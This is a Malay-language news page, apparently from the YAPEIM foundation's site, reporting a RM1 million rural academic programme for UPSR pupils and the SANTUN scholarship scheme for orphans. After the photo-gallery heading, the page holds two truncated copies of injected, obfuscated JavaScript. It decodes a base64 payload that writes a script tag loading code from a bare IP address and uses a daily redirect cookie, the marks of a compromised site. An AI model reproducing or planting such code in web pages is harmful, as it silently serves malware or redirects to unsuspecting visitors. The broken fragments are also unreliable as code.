YaPEIM » YAPEIM Labur RM1 Juta Program Peningkatan Akademik Luar Bandar

Terkini

YAPEIM Labur RM1 Juta Program Peningkatan Akademik Luar Bandar

YAPEIM turut memberi perhatian kepada anak yatim di seluruh negara untuk melanjutkan pelajaran ke IPTA dibawah Skim SANTUN, katanya.

LANGKAWI, 29 April- Yayasan Pembangunan Ekonomi Islam Malaysia (YAPEIM) melabur RM1 juta bagi pelaksanaan program peningkatan akademik di kalangan murid luar bandar.

Ketua Pengarah YAPEIM Datuk Abibullah Samsudin berkata program itu dikhususkan untuk calon Ujian Pencapaian Sekolah Rendah (UPSR) membabitkan 145 daerah terpilih seluruh negara.

“Dengan adanya program itu, kita harapkan pencapaian murid-murid luar bandar akan meningkat”, katanya pada sidang media selepas merasmikan majlis Inspirasi YAPEIM di Sekolah Kebangsaan (SK) Lubuk Chempadak, Pulau Tuba di sini, hari ini.

Beliau berkata program itu disalurkan menerusi tiga program bersepadu iaitu motivasi pelajar, teknik menjawab soalan dan motivasi murid Tahun Enam bermula tahun ini.

YAPEIM turut memberi perhatian kepada anak-anak yatim di seluruh negara untuk melanjutkan pelajaran ke Institusi Pengajian Tinggi Awam (IPTA) dibawah Skim Anugerah Kecemerlangan Pelajar Nasional (SANTUN), katanya.

Sehingga kini seramai 5,400 anak yatim dan miskin mendapat faedah menerusi program SANTUN dengan mengikuti pengajian dalam pelbagai bidang di dalam dan luar negara. “Sebahagian daripada mereka dilatih untuk menjadi usahawan dan pakar dalam 29 bidang terpilih termasuk perubatan dan kejuruteraan”, katanya.

– BERNAMA

Galeri Gambar

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top